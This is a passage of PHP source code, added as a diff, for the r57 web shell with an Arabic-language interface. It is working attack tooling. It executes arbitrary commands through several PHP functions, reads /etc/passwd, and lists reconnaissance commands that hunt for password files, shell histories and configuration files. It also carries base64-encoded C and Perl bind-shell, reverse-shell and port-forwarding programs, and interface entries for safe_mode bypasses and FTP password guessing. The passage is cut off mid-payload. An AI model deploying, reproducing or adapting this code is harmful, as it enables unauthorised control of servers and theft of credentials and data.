????????????? ??????? mb_send_mail', +'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list', +'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body', +'ru_text115'=>'???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? compress.zlib:// ? copy()', +'ru_text116'=>'?????????? ????', +'ru_text117'=>'?', +'ru_text118'=>'???? ??????????', +'ru_text119'=>'?? ??????? ??????????? ????', +'ru_err0'=>'??????! ?? ???? ???????? ? ???? ', +'ru_err1'=>'??????! ?? ???? ????????? ???? ', +'ru_err2'=>'??????! ?? ??????? ??????? ', +'ru_err3'=>'??????! ?? ??????? ???????????? ? ftp ???????', +'ru_err4'=>'?????? ??????????? ?? ftp ???????', +'ru_err5'=>'??????! ?? ??????? ???????? ?????????? ?? ftp ???????', +'ru_err6'=>'??????! ?? ??????? ????????? ??????', +'ru_err7'=>'?????? ??????????', +/* --------------------------------------------------------------- */ +'eng_text1' =>'الامر المنفذ', +'eng_text2' =>'تنفيذ الاوامر في السيرفر', +'eng_text3' =>'امر التشغيل', +'eng_text4' =>'مكان عملك الان على السيرفر', +'eng_text5' =>'رفع ملف الى السيرفر', +'eng_text6' =>'مسار ملفك', +'eng_text7' =>'اوامر جاهزه', +'eng_text8' =>'اختر الامر', +'eng_butt1' =>'تنفيذ', +'eng_butt2' =>'رفـع', +'eng_text9' =>'فتح بورت في السيرفر على /bin/bash', +'eng_text10'=>'بـورت', +'eng_text11'=>'باسورد للدخول', +'eng_butt3' =>'فتح', +'eng_text12'=>'أتصـال عـكسي', +'eng_text13'=>'الاي بي', +'eng_text14'=>'المنفذ', +'eng_butt4' =>'أتـصال', +'eng_text15'=>'سحب ملفات الى السيرفر', +'eng_text16'=>'عن طريق', +'eng_text17'=>'رابط الملف', +'eng_text18'=>'مكان نزوله', +'eng_text19'=>'Exploits', +'eng_text20'=>'إستخدم', +'eng_text21'=>'&nbsp;الاسم الجديد', +'eng_text22'=>'انبوب البيانات', +'eng_text23'=>'البورت المحلي', +'eng_text24'=>'السيرفر البعيد', +'eng_text25'=>'المنفذ البعيد', +'eng_text26'=>'استخدم', +'eng_butt5' =>'تشغيل', +'eng_text28'=>'العمل في الوضع الامن', +'eng_text29'=>'ممنوع الدخول', +'eng_butt6' =>'تغير', +'eng_text30'=>'عرض ملف', +'eng_butt7' =>'عرض', +'eng_text31'=>'الملف غير موجود', +'eng_text32'=>'تنفيذ كود php عن طريق داله eval', +'eng_text33'=>'Test bypass open_basedir with cURL functions', +'eng_butt8' =>'اختبار', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'القاعدة . الجدول', +'eng_text37'=>'اسم المستخدم', +'eng_text38'=>'كلمة المرور', +'eng_text39'=>'القاعدة', +'eng_text40'=>'نسخة من جداول القاعدة', +'eng_butt9' =>'نسخة', +'eng_text41'=>'حفظ النسخة في', +'eng_text42'=>'تعديل الملفات', +'eng_text43'=>'الملف المراد تعديله', +'eng_butt10'=>'حفظ', +'eng_text44'=>'لاتستطيع التعديل على هذا الملف فقط تقرأ', +'eng_text45'=>'تم الحفظ', +'eng_text46'=>'عرض phpinfo()', +'eng_text47'=>'رؤية المتغيرات في php.ini', +'eng_text48'=>'مسح ملفات الـ temp', +'eng_butt11'=>'تحرير الملف', +'eng_text49'=>'مسح السكربت من السيرفر', +'eng_text50'=>'عرض معلومات الذاكرة الرئيسية', +'eng_text51'=>'عرض معلومات الذاكرة', +'eng_text52'=>'بحث نص', +'eng_text53'=>'في المسار', +'eng_text54'=>'بحث عن نص في الملفات', +'eng_butt12'=>'بحث', +'eng_text55'=>'فقط في الملفات', +'eng_text56'=>'لايوجد :(', +'eng_text57'=>'انشاء/مسح ملف/مجلد', +'eng_text58'=>'الاسم', +'eng_text59'=>'ملف', +'eng_text60'=>'مجلد', +'eng_butt13'=>'إنشاء /مسح', +'eng_text61'=>'تم إنشاء الملف', +'eng_text62'=>'تم إنشاء المجلد', +'eng_text63'=>'تم مسح الملف', +'eng_text64'=>'تم مسح المجلد', +'eng_text65'=>'إنشاء', +'eng_text66'=>'مسح', +'eng_text67'=>'التصريح/المستخدم/المجموعة', +'eng_text68'=>'امر', +'eng_text69'=>'إسم الملف', +'eng_text70'=>'التصريح', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'النص المراد', +'eng_text73'=>'بحث في المجلدات', +'eng_text74'=>'بحث في الملفات', +'eng_text75'=>'* you can use regexp', +'eng_text76'=>'البحث عن نص في ملفات بواسطه find', +'eng_text80'=>'النوع', +'eng_text81'=>'الإتصالات', +'eng_text82'=>'قواعد البيانات', +'eng_text83'=>'تشغيل امر استعلام', +'eng_text84'=>'استعلام قاعدة', +'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', +'eng_text86'=>'تنزيل ملفات من السيرفر', +'eng_butt14'=>'تحميل', +'eng_text87'=>'تنزيل ملفات من خادم الاف تي بي', +'eng_text88'=>'سيرفر الاف تي بي:المنفذ', +'eng_text89'=>'ملف في الاف تي بي', +'eng_text90'=>'التحويل الى', +'eng_text91'=>'ارشفة', +'eng_text92'=>'من غير الارشفة', +'eng_text93'=>'الاف تي بي', +'eng_text94'=>'تخمين الاف تي بي', +'eng_text95'=>'قائمة المستخدمين', +'eng_text96'=>'لم يستطع سحب قائمة المستخدمين', +'eng_text97'=>'تم الفحص: ', +'eng_text98'=>'تم بنجاح: ', +'eng_text99'=>'* استخدم اسماء المستخدمين في ملف /etc/passwd لدخول للـ ftp', +'eng_text100'=>'ارسال ملف الى خادم الاف تي بي', +'eng_text101'=>'استخدم الاسامي معكوسه لتخمينها', +'eng_text102'=>'خدمات البريد', +'eng_text103'=>'ارسال بريد', +'eng_text104'=>'ارسال ملف الى الايميل', +'eng_text105'=>'إلى', +'eng_text106'=>'مـن', +'eng_text107'=>'الموضوع', +'eng_butt15'=>'إرسال', +'eng_text108'=>'الرسالة', +'eng_text109'=>'مخفي', +'eng_text110'=>'عرض', +'eng_text111'=>'سيرفر قواعد البيانات : المنفذ', +'eng_text112'=>'قرائة الملفات عن طريق ثغرة داله mb_send_mail', +'eng_text113'=>'قرائة محتوى المجلدات عن طريق via imap_list', +'eng_text114'=>'قرائة الملفات عن طريق ثغرة via imap_body', +'eng_text115'=>'قرائة الملفات عن طريق compress.zlib://', +'eng_text116'=>'نسخ من', +'eng_text117'=>'الى', +'eng_text118'=>'تم نسخ الملف', +'eng_text119'=>'لايستطيع النسخ', +'eng_err0'=>'خطاء ! لايمكن الكتابة على هذا الملف ', +'eng_err1'=>'خطاء ! غير قادر على قرائه هذا الملف ', +'eng_err2'=>'خطاء! لايمكن الانشاء ', +'eng_err3'=>'خطاء! غير قادر على الاتصال بالاف تي بي', +'eng_err4'=>'خطاء ! لاتستطيع الدخول الى سيرفر الاف تي بي', +'eng_err5'=>'خطاء ! لاتستطيع تغير المجلد في الاف تي بي', +'eng_err6'=>'خطاء ! لاتستطيع ارسال رساله', +'eng_err7'=>'البريد ارسل', +'eng_text200'=>'قرائة الملفات عن طريق ثغرة copy()', +'eng_text202'=>'مسار الملف المراد قرائته', +'eng_text300'=>'قرائه الملفات عن طريق ثغرة curl()', +'eng_text302'=>'مسار الملف المراد قرائته', +); +/* +?????? ?????? +????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) +?? ?????? ???? ????????? ??? ???????? ???????. +*/ +$aliases=array( +'البحث عن ملفات suid'=>'find / -type f -perm -04000 -ls', +'البحث عن ملفات suid في المجلد الحالي'=>'find . -type f -perm -04000 -ls', +'البحث عن ملفات suid'=>'find / -type f -perm -02000 -ls', +'البحث عن ملفات suid في المجلد الحالي'=>'find . -type f -perm -02000 -ls', +'البحث عن ملفات config.inc.php'=>'find / -type f -name config.inc.php', +'البحث عن ملفات config.inc.php في المجلد الحالي'=>'find . -type f -name config.inc.php', +'البحث عن ملفات config* بجميع الامتدادات'=>'find / -type f -name "config*"', +'البحث عن ملفات config* في المجلد الحالي'=>'find . -type f -name "config*"', +'البحث عن الملفات القابلة للكتابة'=>'find / -type f -perm -2 -ls', +'البحث عن الملفات القابلة للكتابة في المجلد الحالي'=>'find . -type f -perm -2 -ls', +'البحث عن المجلدات القابلة للكتابة'=>'find / -type d -perm -2 -ls', +'البحث عن المجلدات القابلة للكتابة في المسار الحالي'=>'find . -type d -perm -2 -ls', +'البحث عن ملفات ومجلدات قابلة للكتابة'=>'find / -perm -2 -ls', +'البحث عن ملفات ومجلدات في المسار الحالي'=>'find . -perm -2 -ls', +'البحث عن ملفات service.pwd'=>'find / -type f -name service.pwd', +'البحث عن ملفات service.pwd في المسار الحالي'=>'find . -type f -name service.pwd', +'البحث عن كل ملفات الجدران النارية .htpasswd'=>'find / -type f -name .htpasswd', +'البحث عن جميع ملفات الجدران النارية في المسار الحالي'=>'find . -type f -name .htpasswd', +'البحث عن جميع ملفات .bash_history'=>'find / -type f -name .bash_history', +'البحث عن جميع ملفات .bash_history في المسار الحالي'=>'find . -type f -name .bash_history', +'البحث عن جميع ملفات .mysql_history'=>'find / -type f -name .mysql_history', +'البحث عن جميع ملفات .mysql_history في المسار الحالي'=>'find . -type f -name .mysql_history', +'البحث عن جميع ملفات .fetchmailrc'=>'find / -type f -name .fetchmailrc', +'البحث عن جميع ملفات .fetchmailrc في المسار الحالي'=>'find . -type f -name .fetchmailrc', +'اخر ملفات مشغله في النظام'=>'lsattr -va', +'رؤية البورتات المفتوحة في السيرفر'=>'netstat -an | grep -i listen', +'رؤية حالة المجلدات وامكانية التنفيذ'=>'cat /etc/fstab', +'مشاهدة ملف اللوق لدخول السي بانل والمواقع على السيرفر'=>'cat /var/cpanel/accounting.log', +'----------------------------------------------------------------------------------------------------'=>'ls -la' +); +$table_up1 = "<tr><td bgcolor=#000000><font face=tahoma size=-2><b><div align=center>:: "; +$table_up2 = " ::</div></b></font></td></tr><tr><td>"; +$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000>"; +$table_end1 = "</td></tr>"; +$arrow = " <font face=Webdings color=gray>4</font>"; +$lb = "<font color=black>[</font>"; +$rb = "<font color=black>]</font>"; +$font = "<font face=tahoma size=-2>"; +$ts = "<table class=table1 width=100% align=center>"; +$te = "</table>"; +$fs = "<form name=form method=POST>"; +$fe = "</form>"; + +if(isset($_GET['users'])) + { + if(!$users=get_users()) { echo "<center><font face=tahoma size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; } + else + { + echo '<center>'; + foreach($users as $user) { echo $user."<br>"; } + echo '</center>'; + } + echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } + +if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } +$dir = @getcwd(); +$unix = 0; +if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1; +if(empty($dir)) + { + $os = getenv('OS'); + if(empty($os)){ $os = php_uname(); } + if(empty($os)){ $os ="-"; $unix=1; } + else + { + if(@eregi("^win",$os)) { $unix = 0; } + else { $unix = 1; } + } + } +if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") + { + echo $head; + if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } + else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } + $sr->SearchText(0,0); + $res = $sr->GetResultFiles(); + $found = $sr->GetMatchesCount(); + $titles = $sr->GetTitles(); + $r = ""; + if($found > 0) + { + $r .= "<TABLE width=100%>"; + foreach($res as $file=>$v) + { + $r .= "<TR>"; + $r .= "<TD colspan=2><font face=tahoma size=-2><b>".ws(3); + $r .= (!$unix)? str_replace("/","\\",$file) : $file; + $r .= "</b></font></ TD>"; + $r .= "</TR>"; + foreach($v as $a=>$b) + { + $r .= "<TR>"; + $r .= "<TD align=center><B><font face=tahoma size=-2>".$a."</font></B></TD>"; + $r .= "<TD><font face=tahoma size=-2>".ws(2).$b."</font></TD>"; + $r .= "</TR>\n"; + } + } + $r .= "</TABLE>"; + echo $r; + } + else + { + echo "<P align=center><B><font face=tahoma size=-2>".$lang[$language.'_text56']."</B></font></P>"; + } + echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; } +$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); +if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } +function ws($i) +{ +return @str_repeat("&nbsp;",$i); +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +function get_users() +{ + $users = array(); + $rows=file('/etc/passwd'); + if(!$rows) return 0; + foreach ($rows as $string) + { + $user = @explode(":",$string); + if(substr($string,0,1)!='#') array_push($users,$user[0]); + } + return $users; +} +function err($n,$txt='') +{ +echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#000000><font color=red face=tahoma size=-2><div align=center><b>'; +echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; +if(!empty($txt)) { echo " $txt"; } +echo '</b></div></font></td></tr></table>'; +return null; +} +function perms($mode) +{ +if (!$GLOBALS['unix']) return 0; +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} +function in($type,$name,$size,$value,$checked=0) +{ + $ret = "<input type=".$type." name=".$name." "; + if($size != 0) { $ret .= "size=".$size." "; } + $ret .= "value=\"".$value."\""; + if($checked) $ret .= " checked"; + return $ret.">"; +} +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or err(0); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} +function sr($l,$t1,$t2) + { + return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; + } +if (!@function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} + function DirFilesR($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if($types) + { + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$a<count($dirs);$a++) + $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) + { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = @file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + if(($count = @preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; +$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd +KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj +aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy +LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow +0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA +gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC 